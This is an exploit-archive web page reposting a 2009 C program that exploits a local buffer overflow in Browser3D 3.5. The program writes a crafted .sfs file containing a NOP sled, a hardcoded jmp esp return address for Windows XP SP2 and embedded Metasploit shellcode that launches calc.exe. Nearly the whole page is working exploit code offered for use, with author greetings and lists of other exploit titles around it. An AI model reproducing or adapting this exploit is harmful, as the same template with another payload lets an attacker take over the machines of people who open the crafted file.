首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Browser3D version 3.5 local buffer overflow exploit that spawns calc.exe
来源:maroc-anti-connexion[at]hotmail.com 作者:SimO-s0fT 发布时间:2009-01-22  
#include<stdio.h>
#include<string.h>
#include<windows.h>

/* Browser3D local BOF exploit
* coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com)
*greetz to: all friends & all morroccan hackers
*special tnx for ZAML str0ke
/* win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2"
"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47"
"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b"
"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f"
"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64"
"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26"
"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89"
"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a"
"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06"
"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
int main(int argc,char *argv[]){
    printf("\t ===>viva marrakesh city<===\t\n");
    FILE *openfile;
    char exploit[430];
    char junk[262];
    char ret[]="\x68\xD5\x85\7C";//jmp kernel32.dll esp (windows trust sp2)
    char nop[]="\x90\x90\x90\x90";
    memset(junk,0x90,262);
    memcpy(exploit,junk,strlen(junk));
    memcpy(exploit+strlen(junk),ret,strlen(ret));
    memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
    memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
    openfile=fopen("simo.sfs","wb");
    if(openfile==NULL){ perror("can't opening this file\n"); }
    fwrite(exploit,1,sizeof(exploit),openfile);
    fclose(openfile);
    printf("file created ....!"
                 "open it whit Browser3d");
    return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla com_pcchess (game_id) B
·Browser3D 3.5 (.sfs File) Loca
·Sad Raven's Click Counter 1.0
·Pardal CMS <= 0.2.0 Blind SQL
·Firefox 3.0.5 Status Bar Obfus
·FTPShell Server 4.3 (licence k
·Joomla Com BazaarBuilder Shopp
·VUPlayer 2.49 .ASX local unive
·Total Video Player 1.31 (Defau
·GuildFTPd FTP server version 0
·LinPHA Photo Gallery 2.0 Remot
·Nokia DX200 M13 and S12 TCP SY
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved